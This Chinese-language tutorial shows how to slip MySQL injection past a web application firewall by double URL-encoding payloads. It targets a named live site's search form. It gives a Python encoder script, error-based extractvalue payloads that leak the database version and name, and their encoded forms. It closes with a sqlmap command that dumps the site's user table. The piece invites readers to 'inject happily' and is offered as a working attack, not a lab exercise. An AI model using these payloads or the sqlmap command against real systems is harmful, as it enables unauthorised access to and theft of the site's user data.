mysql利用双重url编码绕过防火墙

例子：

http://www.gzidc.org/search/

post 的数据：

keyword=a

如果单纯的在搜索框中输入：select , union,detele,' 那么就会被waf阻拦页面会显示：非法字符

如果用双重编码的url替换注入语句那么，waf就不会拦截

下面我写了一个程序来讲普通的注入语句转换为双重url编码：

import stringpayload="' and extractvalue(1, concat(0x5c,version())) #"retVal = payloadif payload:    retVal = ""    i = 0    while i < len(payload):        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:            retVal += '%%25%s' % payload[i + 1:i + 3]            i += 3        else:            retVal += '%%25%.2X' % ord(payload[i])            i += 1print retVal

那么我们用的一切注入语句都可以这样表示：

比如：

' and extractvalue(1, concat(0x5c,version())) #

转换之后为：

%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523

然后丢到搜索框里面，然后通过报错信息得到数据库版本号

在比如：

' and extractvalue(1, concat(0x5c,(select database()))) #

转换之后为

%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2528%2573%2565%256C%2565%2563%2574%2520%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2529%2529%2529%2520%2523

就能拿到数据库的名字

愉快的注入吧

sqlmap 指令：sqlmap -u "http://www.gzidc.org/search/" --data "keyword=1" --tamper chardoubleencode -D "gzidc" -T "shl_user" --dump -v 3